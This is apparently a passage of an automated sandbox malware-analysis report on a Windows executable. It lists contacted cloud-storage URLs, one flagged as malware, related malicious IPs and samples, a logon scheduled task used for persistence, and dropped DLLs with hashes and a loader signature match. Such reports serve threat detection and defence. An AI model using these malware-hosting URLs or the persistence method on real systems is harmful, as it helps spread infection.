              https://kdll-1323571269.cos.ap-beijing.myqcloud.com/vcruntime140.dllnLisectAVT_2403002B_185.exe, 00000000.00000003.1436909329.0000000000D65000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://kdll-1323571269.cos.ap-beijing.myqcloud.com/msvcp140.dllhingLisectAVT_2403002B_185.exe, 00000000.00000003.1508631410.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1472994046.0000000000D5E000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://leisuretrade-1323571269.cos.ap-beijing.myqcloud.com/wLisectAVT_2403002B_185.exe, 00000000.00000003.1545465793.0000000000D62000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              unknown
              https://kdll-1323571269.cos.ap-beijing.myqcloud.com/QLisectAVT_2403002B_185.exe, 00000000.00000003.1508631410.0000000000D62000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://kdll-1323571269.cos.ap-beijing.myqcloud.com/msvcp140.dlldllLisectAVT_2403002B_185.exe, 00000000.00000003.1472994046.0000000000D5E000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://kdll-1323571269.cos.ap-beijing.myqcloud.com/vcruntime140.dllxLisectAVT_2403002B_185.exe, 00000000.00000003.1436909329.0000000000D65000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              43.153.232.152
              sgp.file.myqcloud.comJapan4249LILLY-ASUSfalse
              82.156.94.13
              unknownChina
              12513ECLIPSEGBfalse
              82.156.94.45
              bj.file.myqcloud.comChina
              12513ECLIPSEGBfalse
              Joe Sandbox version:40.0.0 Tourmaline
              Analysis ID:1482004
              Start date and time:2024-07-25 17:02:01 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 5m 53s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:20
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:LisectAVT_2403002B_185.exe
              Detection:MAL
              Classification:mal88.evad.winEXE@5/19@4/3
              EGA Information:
              • Successful, ratio: 100%
              HCA Information:
              • Successful, ratio: 100%
              • Number of executed functions: 101
              • Number of non-executed functions: 61
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe
              • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
              • Not all processes where analyzed, report is missing behavior information
              • Report size getting too big, too many NtCreateKey calls found.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • Report size getting too big, too many NtReadVirtualMemory calls found.
              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
              • VT rate limit hit for: LisectAVT_2403002B_185.exe
              TimeTypeDescription
              12:49:51API Interceptor45x Sleep call for process: LisectAVT_2403002B_185.exe modified
              18:49:57Task SchedulerRun new task: OnLogon path: C:\Program Files (x86)\Everything\Everything.exe s>1
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              43.153.232.152LisectAVT_2403002B_295.exeGet hashmaliciousUnknownBrowse
                LisectAVT_2403002B_321.exeGet hashmaliciousUnknownBrowse
                  LisectAVT_2403002C_57.exeGet hashmaliciousUnknownBrowse
                    https://v02i29jwyl-1324277188.cos.ap-singapore.myqcloud.com/v02i29jwyl.htmlGet hashmaliciousHTMLPhisherBrowse
                      https://docs.google.com/presentation/d/e/2PACX-1vRLd0kcVFz9h2YfkJ5nqT-SOn8rPnsID4V6KoblagKxsqmWxdzqw58DZbzyFQwP58roXNGiXOHm3hC-/pub?start=false&loop=false&delayms=3000Get hashmaliciousHTMLPhisherBrowse
                        https://thepiecehall-my.sharepoint.com/:o:/g/personal/alice_bailey_thepiecehall_co_uk/EjWZnrwvL_NEvRNFzjIEyrkBCjxZm3JFiqR9uLcShv_eEQ?e=5%3aJfKzbl&fromShare=true&at=9Get hashmaliciousHTMLPhisherBrowse
                          https://thepiecehall-my.sharepoint.com:443/:o:/g/personal/alice_bailey_thepiecehall_co_uk/EjWZnrwvL_NEvRNFzjIEyrkBCjxZm3JFiqR9uLcShv_eEQ?e=5%3aJfKzbl&fromShare=true&at=9Get hashmaliciousHTMLPhisherBrowse
                            https://indd.adobe.com/view/801f03d9-90b1-4835-a925-9e392cc9953aGet hashmaliciousHTMLPhisherBrowse
                              https://attachmentpresentation.w3spaces.com/Get hashmaliciousHTMLPhisherBrowse
                                https://my.visme.co/view/mxk7zz1d-pjm-group-ltdGet hashmaliciousHTMLPhisherBrowse
                                  82.156.94.13https://appservies02342-1321331581.cos.ap-beijing.myqcloud.com/cummon/update-agreements/claimGet hashmaliciousHTMLPhisherBrowse
                                    https://appservies02342-1321331581.cos.ap-beijing.myqcloud.com/cummon/update-agreements/claimGet hashmaliciousHTMLPhisherBrowse
                                      82.156.94.45LisectAVT_2403002A_276.exeGet hashmaliciousUnknownBrowse
                                        4a9OE5cKJo.exeGet hashmaliciousUnknownBrowse
                                          1q3HnZAcnJ.exeGet hashmaliciousUnknownBrowse
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            bj.file.myqcloud.comLisectAVT_2403002A_276.exeGet hashmaliciousUnknownBrowse
                                            • 82.156.94.45
                                            https://appservies02342-1321331581.cos.ap-beijing.myqcloud.com/cummon/update-agreements/claimGet hashmaliciousHTMLPhisherBrowse
                                            • 82.156.94.13
                                            setup#U67e5#U8be2_pf2024.exeGet hashmaliciousGhostRat, NitolBrowse
                                            • 82.156.94.17
                                            https://appservies02342-1321331581.cos.ap-beijing.myqcloud.com/cummon/update-agreements/claimGet hashmaliciousHTMLPhisherBrowse
                                            • 82.156.94.13
                                            New_Text_Document_mod.exse.exeGet hashmaliciousAgentTesla, Amadey, Creal Stealer, Djvu, FormBook, Glupteba, GuLoaderBrowse
                                            • 82.156.94.48
                                            4a9OE5cKJo.exeGet hashmaliciousUnknownBrowse
                                            • 82.156.94.45
                                            4a9OE5cKJo.exeGet hashmaliciousUnknownBrowse
                                            • 82.156.94.47
                                            1q3HnZAcnJ.exeGet hashmaliciousUnknownBrowse
                                            • 82.156.94.45
                                            word.exeGet hashmaliciousUnknownBrowse
                                            • 82.156.94.48
                                            sgp.file.myqcloud.comLisectAVT_2403002B_246.exeGet hashmaliciousUnknownBrowse
                                            • 43.152.64.207
                                            LisectAVT_2403002B_246.exeGet hashmaliciousUnknownBrowse
                                            • 43.153.232.151
                                            LisectAVT_2403002B_295.exeGet hashmaliciousUnknownBrowse
                                            • 43.152.64.207
                                            LisectAVT_2403002B_295.exeGet hashmaliciousUnknownBrowse
                                            • 43.152.64.193
                                            LisectAVT_2403002B_321.exeGet hashmaliciousUnknownBrowse
                                            • 43.152.64.207
                                            LisectAVT_2403002B_321.exeGet hashmaliciousUnknownBrowse
                                            • 43.153.232.152
                                            LisectAVT_2403002B_78.exeGet hashmaliciousUnknownBrowse
                                            • 43.152.64.193
                                            LisectAVT_2403002B_78.exeGet hashmaliciousUnknownBrowse
                                            • 43.152.64.207
                                            LisectAVT_2403002C_57.exeGet hashmaliciousUnknownBrowse
                                            • 43.152.64.193
                                            LisectAVT_2403002C_57.exeGet hashmaliciousUnknownBrowse
                                            • 43.153.232.152
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            ECLIPSEGBLisectAVT_2403002A_276.exeGet hashmaliciousUnknownBrowse
                                            • 82.156.94.45
                                            0GJSC4Ua2K.elfGet hashmaliciousUnknownBrowse
                                            • 91.84.192.7
                                            KBNCt45Gpk.elfGet hashmaliciousMiraiBrowse
                                            • 212.108.82.87
                                            PO-9412-23007-EPCM_CONSUMABLE_PT.exeGet hashmaliciousFormBookBrowse
                                            • 109.176.207.133
                                            INV90097.exeGet hashmaliciousFormBookBrowse
                                            • 109.176.207.133
                                            SecuriteInfo.com.Win32.RATX-gen.28387.25625.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                            • 109.176.30.246
                                            j4w59eO0yw.exeGet hashmaliciousReverse SSHBrowse
                                            • 82.157.80.216
                                            ztGOiA742S.elfGet hashmaliciousUnknownBrowse
                                            • 109.176.92.189
                                            mfQABKHhh1.elfGet hashmaliciousMiraiBrowse
                                            • 82.152.77.19
                                            https://adclick.g.doubleclick.net/pcs/click?xai=AKAOjstFA55hCSrFSTBDNko3225YAz6GkouTQlHjExWXRbT5OPMnSlE8Wh4LAVp-D7jWRr-LcKW0w-HH1g8lCVAK_eU-5azfUXfjqfTiHFOFWV9I8m2ZaGczGlov1iY8kMSnelCX-AHG6VYBmpcZJapT1XbdlOM3B9u9whYqpkxEpFLbkzwDao00-DL8JyS7UIxIApb_JHANRmtKLSuRcM8IWqFaP0cOc8n8jTedmwHc8oAw2MV2tRUaAnN3eaxaESpc8fovDeWslJ0A3duo5g46YzCYxQ8A56RI5MGcQw4TZj6TeWuj6jRjAe7g0X18--IBmztC1sUi6XuHkB1Ew-z_h9bv1XK-s_9L6zeDfQPtMsI3hOqp8T8545VdgCoElxs&sig=Cg0ArKJSzEpZ_YMvCKWCEAE&fbs_aeid=%5Bgw_fbsaeid%5D&urlfix=1&adurl=https://frizcon.net/sFe5andy9fi2PshFe5rx0qWO3s3Rsdy9s3RWO3BM2Get hashmaliciousHTMLPhisherBrowse
                                            • 109.176.30.7
                                            ECLIPSEGBLisectAVT_2403002A_276.exeGet hashmaliciousUnknownBrowse
                                            • 82.156.94.45
                                            0GJSC4Ua2K.elfGet hashmaliciousUnknownBrowse
                                            • 91.84.192.7
                                            KBNCt45Gpk.elfGet hashmaliciousMiraiBrowse
                                            • 212.108.82.87
                                            PO-9412-23007-EPCM_CONSUMABLE_PT.exeGet hashmaliciousFormBookBrowse
                                            • 109.176.207.133
                                            INV90097.exeGet hashmaliciousFormBookBrowse
                                            • 109.176.207.133
                                            SecuriteInfo.com.Win32.RATX-gen.28387.25625.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                            • 109.176.30.246
                                            j4w59eO0yw.exeGet hashmaliciousReverse SSHBrowse
                                            • 82.157.80.216
                                            ztGOiA742S.elfGet hashmaliciousUnknownBrowse
                                            • 109.176.92.189
                                            mfQABKHhh1.elfGet hashmaliciousMiraiBrowse
                                            • 82.152.77.19
                                            https://adclick.g.doubleclick.net/pcs/click?xai=AKAOjstFA55hCSrFSTBDNko3225YAz6GkouTQlHjExWXRbT5OPMnSlE8Wh4LAVp-D7jWRr-LcKW0w-HH1g8lCVAK_eU-5azfUXfjqfTiHFOFWV9I8m2ZaGczGlov1iY8kMSnelCX-AHG6VYBmpcZJapT1XbdlOM3B9u9whYqpkxEpFLbkzwDao00-DL8JyS7UIxIApb_JHANRmtKLSuRcM8IWqFaP0cOc8n8jTedmwHc8oAw2MV2tRUaAnN3eaxaESpc8fovDeWslJ0A3duo5g46YzCYxQ8A56RI5MGcQw4TZj6TeWuj6jRjAe7g0X18--IBmztC1sUi6XuHkB1Ew-z_h9bv1XK-s_9L6zeDfQPtMsI3hOqp8T8545VdgCoElxs&sig=Cg0ArKJSzEpZ_YMvCKWCEAE&fbs_aeid=%5Bgw_fbsaeid%5D&urlfix=1&adurl=https://frizcon.net/sFe5andy9fi2PshFe5rx0qWO3s3Rsdy9s3RWO3BM2Get hashmaliciousHTMLPhisherBrowse
                                            • 109.176.30.7
                                            LILLY-ASUSLisectAVT_2403002B_202.exeGet hashmaliciousUnknownBrowse
                                            • 43.152.28.43
                                            LisectAVT_2403002B_202.exeGet hashmaliciousUnknownBrowse
                                            • 43.129.31.231
                                            LisectAVT_2403002B_225.exeGet hashmaliciousUnknownBrowse
                                            • 43.129.30.209
                                            LisectAVT_2403002B_246.exeGet hashmaliciousUnknownBrowse
                                            • 43.152.64.207
                                            LisectAVT_2403002B_246.exeGet hashmaliciousUnknownBrowse
                                            • 43.152.64.207
                                            LisectAVT_2403002B_295.exeGet hashmaliciousUnknownBrowse
                                            • 43.152.64.207
                                            LisectAVT_2403002B_295.exeGet hashmaliciousUnknownBrowse
                                            • 43.152.64.193
                                            LisectAVT_2403002B_321.exeGet hashmaliciousUnknownBrowse
                                            • 43.152.64.207
                                            LisectAVT_2403002B_321.exeGet hashmaliciousUnknownBrowse
                                            • 43.153.232.152
                                            LisectAVT_2403002B_429.exeGet hashmaliciousBdaejecBrowse
                                            • 43.152.29.63
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            37f463bf4616ecd445d4a1937da06e19LisectAVT_2403002B_198.exeGet hashmaliciousXRedBrowse
                                            • 43.153.232.152
                                            • 82.156.94.13
                                            • 82.156.94.45
                                            67#U2464.htaGet hashmaliciousUnknownBrowse
                                            • 43.153.232.152
                                            • 82.156.94.13
                                            • 82.156.94.45
                                            LisectAVT_2403002B_246.exeGet hashmaliciousUnknownBrowse
                                            • 43.153.232.152
                                            • 82.156.94.13
                                            • 82.156.94.45
                                            fuol91mv.exeGet hashmaliciousUnknownBrowse
                                            • 43.153.232.152
                                            • 82.156.94.13
                                            • 82.156.94.45
                                            LisectAVT_2403002B_245.exeGet hashmaliciousUnknownBrowse
                                            • 43.153.232.152
                                            • 82.156.94.13
                                            • 82.156.94.45
                                            fuol91mv.exeGet hashmaliciousUnknownBrowse
                                            • 43.153.232.152
                                            • 82.156.94.13
                                            • 82.156.94.45
                                            LisectAVT_2403002B_246.exeGet hashmaliciousUnknownBrowse
                                            • 43.153.232.152
                                            • 82.156.94.13
                                            • 82.156.94.45
                                            IMG88957937579577593957937593756295Jimpy.exeGet hashmaliciousGuLoaderBrowse
                                            • 43.153.232.152
                                            • 82.156.94.13
                                            • 82.156.94.45
                                            LisectAVT_2403002B_286.exeGet hashmaliciousUnknownBrowse
                                            • 43.153.232.152
                                            • 82.156.94.13
                                            • 82.156.94.45
                                            LisectAVT_2403002B_286.exeGet hashmaliciousUnknownBrowse
                                            • 43.153.232.152
                                            • 82.156.94.13
                                            • 82.156.94.45
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            C:\Program Files (x86)\Everything\msvcp140.dllLisectAVT_2403002B_246.exeGet hashmaliciousUnknownBrowse
                                              LisectAVT_2403002B_246.exeGet hashmaliciousUnknownBrowse
                                                LisectAVT_2403002B_295.exeGet hashmaliciousUnknownBrowse
                                                  LisectAVT_2403002B_295.exeGet hashmaliciousUnknownBrowse
                                                    LisectAVT_2403002B_78.exeGet hashmaliciousUnknownBrowse
                                                      LisectAVT_2403002B_78.exeGet hashmaliciousUnknownBrowse
                                                        2024po.exeGet hashmaliciousGhostRatBrowse
                                                          2024po.exeGet hashmaliciousGhostRatBrowse
                                                            psqlodbc-setup.exeGet hashmaliciousPrivateLoaderBrowse
                                                              psqlodbc-setup.exeGet hashmaliciousPrivateLoaderBrowse
                                                                Process:C:\Users\user\Desktop\LisectAVT_2403002B_185.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):40917
                                                                Entropy (8bit):7.28053200206121
                                                                Encrypted:false
                                                                SSDEEP:768:3SR/d8civCTlNQHE64vMXuyMcS7iKGztVuanh8w2OfJ7ejaP6yEqzeGO0gf:Q/dSCoHE6wE7McS7i9u6yeNejY6yFOB
                                                                MD5:8AA72F47438EEBD6FE0E8C94BD206CA8
                                                                SHA1:6B9AD499F5C9E71294E3086A8C6E56F3B5C4590F
                                                                SHA-256:E45B9DFCCD0EEE7F4D676E2AAA74D8FE0238A3B37E2B21A9182C283B70D6A2FD
                                                                SHA-512:A5315D541B118D72997204FA983EBB0046F8B8D09EABEDFC1C1BCC55200B5191611697F2B9BE9B065656FDBC7BE6CE2BC0328BD03BDCD45A7A11384D1B199400
                                                                Malicious:false
                                                                Yara Hits:
                                                                • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: C:\Program Files (x86)\Everything\4.bin, Author: unknown
                                                                Reputation:low
                                                                Preview:..=...=..`9j.k...5pD?.Q....".f 7.h.........}]'..4.NV.h3.t>.Qro.......B.'".i...x.8..RX.K7...f.m4...+.9W!.F.....6...f..l6...Q.fQ..=.F%y..=..H..c.}..x}.....:.E"."....h........~(.k...>B..ns.D.......C.....q...>+CQ0....V.s.....u.}..&I.*8_.!.>..=(.;.....S.*........U....._SO...||_..I..X..R..bD...[..Sz.7...F..u_.....Q.....@...(.-G......}...E...m.l....EL.....)WI.....I/=u3N^WY...#.YH...\j.5{.s.9z7=A..A.Y;...5Yq,.ND\#.M..L....j...O..@-z..n..b._.........u.....ns.KL.h<._..x...D.,....6....}..P.5.-u.u&B#.. .G.|_....]T....}......g....Xl<.J...R~|.m......................N.z..x.+.-}.[;...L;.....].2..*.....4..0...(../.b.C...M=....b{t7........Wp..E...J.~.K...8....g.:[]..{4......V.F.....*y^...M.SI.....i..w..4.<*.Z..$:t8.DJj.+........P.*...w.^@#....X.P.*....H...]...~I.5F...=dA....~kU.Y.X.V+.......m*.)7*.......]i...G.f....=...`......=........R.x.-`.Mbe...M..J..#..Y......Q../H....5...!`.....p?b.... B..../|...fL..q.....V.t....u..P...{...;.&u.p.;..._..1.......T..ru..U.
                                                                Process:C:\Users\user\Desktop\LisectAVT_2403002B_185.exe
                                                                File Type:XML 1.0 document, ASCII text
                                                                Category:dropped
                                                                Size (bytes):427
                                                                Entropy (8bit):5.627605837771879
                                                                Encrypted:false
                                                                SSDEEP:12:TM3iu5veHcwUUDmQ78PAIUeb/XOaGUPUG/JqO11Xbv:qV5jwNA4IUeb/++Uu1BL
                                                                MD5:BA6D076407AAA6FA311702B6C444E1E5
                                                                SHA1:CE7B89CE5D4222AA3046A0608218378A6E0C572A
                                                                SHA-256:D1B81DB360E15C6CAFC16FEB45BED8B0DD65C764A14C64768163A426F30C7668
                                                                SHA-512:1422D7C4269BEBF94BC4B12C44BD85EE67DC4D77662FC05B67FDBC695DBD2081409B06C31C22F51A70B64AE1BC87634F34BB991339F956399665ABCFDB078E6D
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:<?xml version='1.0' encoding='utf-8' ?>.<Error>..<Code>NoSuchKey</Code>..<Message>The specified key does not exist.</Message>..<Resource>/1.exe</Resource>..<RequestId>NjZhMjY5MjVfOThiMzE0MGJfMTUxZGVfNDA2NTUzOA==</RequestId>..<TraceId>OGVmYzZiMmQzYjA2OWNhODk0NTRkMTBiOWVmMDAxODc0OWRkZjk0ZDM1NmI1M2E2MTRlY2MzZDhmNmI5MWI1OTVlYmNhYjQwZWZiOTI4YWY0MTRiOWU0YzQ3ZmVhMjQ3MzA1MGE0MTEyY2JkYThjZGM1ZTg3MTIxMTlhMjg0M2Y=</TraceId>.</Error>..
                                                                Process:C:\Users\user\Desktop\LisectAVT_2403002B_185.exe
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):416932
                                                                Entropy (8bit):6.5611627885040935
                                                                Encrypted:false
                                                                SSDEEP:12288:aZ/8wcqw2oe+Z3VrfwfNOOoWhUgiW6QR7t5ss3Ooc8DHkC2e1:a/8wVwHZFTwFOOos3Ooc8DHkC2e1
                                                                MD5:3B239C13A3F3A771C87869B860306C93
                                                                SHA1:75FCCDB1F863DED4D412A1D3ACB86C3E97CD24BB
                                                                SHA-256:C911EB71A45A88A6AF0800BC26CF8D10C4F5357D8D2499F6F288A2390DF26FBC
                                                                SHA-512:DDAC80C8AB28A4E9D00349740B07A40A8AD1C53A52970DEC29B9271ABA2A04B10E2919757FB128A752ACB643ED107756E0FD4825D6D90E2147A65EEE2F8DD167
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......o...+.N+.N+.N.3wN).N+.N..Nm.aN(.Nm.cN#.Nm.]N..Nm.\Ne.Nm.YN-.Nm.`N*.Nm.gN*.Nm.bN*.NRich+.N........................PE..L....|OR.........."!.........................0......................................5.....@..........................W..L...<...<........................=.......D...................................K..@...............<............................text...<........................... ..`.data....^...0...0... ..............@....idata...............P..............@..@.rsrc................j..............@..@.reloc...D.......F...n..............@..B........................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\Desktop\LisectAVT_2403002B_185.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):446840
                                                                Entropy (8bit):6.690279428020546
                                                                Encrypted:false
                                                                SSDEEP:12288:5mtyWf0sTWRzbpT/tD5YpsGx30h7whUgiW6QR7t5s03Ooc8dHkC2es98R:A0HsTWRzbp5D5YpsM3A7v03Ooc8dHkCh
                                                                MD5:C766CA0482DFE588576074B9ED467E38
                                                                SHA1:5AC975CCCE81399218AB0DD27A3EFFC5B702005E
                                                                SHA-256:85AA8C8AB4CBF1FF9AE5C7BDE1BF6DA2E18A570E36E2D870B88536B8658C5BA8
                                                                SHA-512:EE36BC949D627B06F11725117D568F9CF1A4D345A939D9B4C46040E96C84159FA741637EF3D73ED2D01DF988DE59A573C3574308731402EB52BAE2329D7BDDAC
                                                                Malicious:false
                                                                Joe Sandbox View:
                                                                • Filename: LisectAVT_2403002B_246.exe, Detection: malicious, Browse
                                                                • Filename: LisectAVT_2403002B_246.exe, Detection: malicious, Browse
                                                                • Filename: LisectAVT_2403002B_295.exe, Detection: malicious, Browse
                                                                • Filename: LisectAVT_2403002B_295.exe, Detection: malicious, Browse
                                                                • Filename: LisectAVT_2403002B_78.exe, Detection: malicious, Browse
                                                                • Filename: LisectAVT_2403002B_78.exe, Detection: malicious, Browse
                                                                • Filename: 2024po.exe, Detection: malicious, Browse
                                                                • Filename: 2024po.exe, Detection: malicious, Browse
                                                                • Filename: psqlodbc-setup.exe, Detection: malicious, Browse
                                                                • Filename: psqlodbc-setup.exe, Detection: malicious, Browse
                                                                Reputation:moderate, very likely benign file
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........O.$...w...w...w.\.v...w.V@w...w..v...w...w...w..v...w..v...w..vD..w..v...w.,w...w..v...wRich...w........................PE..L....4.w.........."!...&.....z...............0.......................................=....@A.........................S......8c..........................xO.......4...U..T...........................8U..@............`..0............................text...b........................... ..`.data....&...0......................@....idata..0....`.......0..............@..@.rsrc................H..............@..@.reloc...4.......6...L..............@..B........................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\Desktop\LisectAVT_2403002B_185.exe
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):970744
                                                                Entropy (8bit):6.964896388792595
                                                                Encrypted:false
                                                                SSDEEP:12288:6BmFyjLAOQaYkxGXPfY7eiWWcpOKnpTVOIxhK765qlRRb6x4pI23IbJSH:SmFyjLF847eiWWcoGZVOIxh/WxIAIbu
                                                                MD5:50097EC217CE0EBB9B4CAA09CD2CD73A
                                                                SHA1:8CD3018C4170072464FBCD7CBA563DF1FC2B884C
                                                                SHA-256:2A2FF2C61977079205C503E0BCFB96BF7AA4D5C9A0D1B1B62D3A49A9AA988112
                                                                SHA-512:AC2D02E9BFC2BE4C3CB1C2FFF41A2DAFCB7CE1123998BBF3EB5B4DC6410C308F506451DE9564F7F28EB684D8119FB6AFE459AB87237DF7956F4256892BBAB058
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S9...XlA.XlA.XlA..A.XlA.XmA.XlAQ..A.ZlAQ..AvXlAQ..A!XlAQ..A.XlAQ..A.XlAQ..A.XlAQ..A.XlARich.XlA........PE..L....|OR.........."!................D.....................................................@.........................`........R..(....p...................=......d]..@...8...........................H...@............P...............................text............................... ..`.data...4e.......V..................@....idata.......P......................@....rsrc........p.......0..............@..@.reloc..d].......^...4..............@..B................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\Desktop\LisectAVT_2403002B_185.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):91104
                                                                Entropy (8bit):6.919609919273454
                                                                Encrypted:false
                                                                SSDEEP:1536:wd5wd+ywOpmlhcsrG4ckZEzH3qDLItnTwfVkC2KecbGJ13yd+zTNFZFzK:wdJywOpmlPrHI6D+nTwvlecbG/3y8XG
                                                                MD5:9C133B18FA9ED96E1AEB2DA66E4A4F2B
                                                                SHA1:238D34DBD80501B580587E330D4405505D5E80F2
                                                                SHA-256:C7D9DFDDBE68CF7C6F0B595690E31A26DF4780F465D2B90B5F400F2D8D788512
                                                                SHA-512:D2D588F9940E7E623022ADEBEBDC5AF68421A8C1024177189D11DF45481D7BFED16400958E67454C84BA97F0020DA559A8DAE2EC41950DC07E629B0FD4752E2F
                                                                Malicious:false
                                                                Reputation:moderate, very likely benign file
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................2........I..............o.......o.......o.......o.......o%......o......Rich............PE..L....s............"!...&............P........................................P...........@A........................@........ .......0...................O...@.......$..T............................#..@............ ...............................text...T........................... ..`.data...d...........................@....idata....... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\Desktop\LisectAVT_2403002B_185.exe
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):219584
                                                                Entropy (8bit):6.1663383385555814
                                                                Encrypted:false
                                                                SSDEEP:3072:0Kip9MQPBN+xPYpaEjlFORHc+hmTb2vNESkT6rQxCqCp4fCw4mCD4pbu:0D5N+6fjlURHcTbMNSTbxupfwADL
                                                                MD5:E864FE41A4FEDEC386A65CB456CA3066
                                                                SHA1:3BEE65E903573E7CDB0592F3519F98BDCDE493C3
                                                                SHA-256:06871B2A233E56C57741FD40EC1D298D306C60FCBF5236832C4CE98FF34D8DCA
                                                                SHA-512:4E8C0EB8F2642BA210C53C5CF4379D2F89A1130B148C934B79ACD32B2B77257A18C24173AEF36877C64C46E709EB4A622CF69A352DCEBE97ACCB432F5D886317
                                                                Malicious:false
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........L...L...L...E...F....$..\....$..F....$..N....$..H......I...L...*....'..M....'..M....'b.M....'..M...RichL...........PE..L...>..e...........!...'............3........................................p............@.........................P.......l........................0...).......a.....................................@............................................text............................... ..`.rdata...2.......4..................@..@.data...............................@....rsrc...............................@..@.reloc...a.......b..................@..B................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\Desktop\LisectAVT_2403002B_185.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:modified
                                                                Size (bytes):4077
                                                                Entropy (8bit):5.351303423945478
                                                                Encrypted:false
                                                                SSDEEP:96:iqlYqh3oEFxtIIVMcCgAhMFKrJcqFfr0U1tI6eqzNqMRniAqU57UMq4hS:iqlYqh37IIVMvJcq5dtI6eqzNqM51qUA
                                                                MD5:BDC14B6EA42EEA6E0D8B536DBC9DCDB0
                                                                SHA1:EEEDB8B60B2FC49C9D12D1FD267146AFF55E6ECC
                                                                SHA-256:CDE89D8254F2C6AF2FC1F4F12A8CB77401543F5BE05EE6080518F47DF73FA014
                                                                SHA-512:0CDCDE0E18F1C36DA7525FA8FE463720103245E97194D9C86E515F7374C425228DBFCFF22148AC46AD50BFABE2CB0FCC6B90118833777D35CA6F183C09B7F68F
                                                                Malicious:true
                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Management.Automation, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#\7ae6ae69c7471e5e034a046629402c6a\System.Management.Automation.ni.dll",0..3,"Microsoft.PowerShell.Commands.Diagnostics, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P1706cafe#\5484a7638cf633fd03f0dcd66df5a16d\Microsoft.PowerShell.Commands.Diagnostics.ni.dll",0..3,"System.Configuration.Install, Version=4.0.0.0, Culture=neutral
                                                                Process:C:\Users\user\Desktop\LisectAVT_2403002B_185.exe
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):416932
                                                                Entropy (8bit):6.5611627885040935
                                                                Encrypted:false
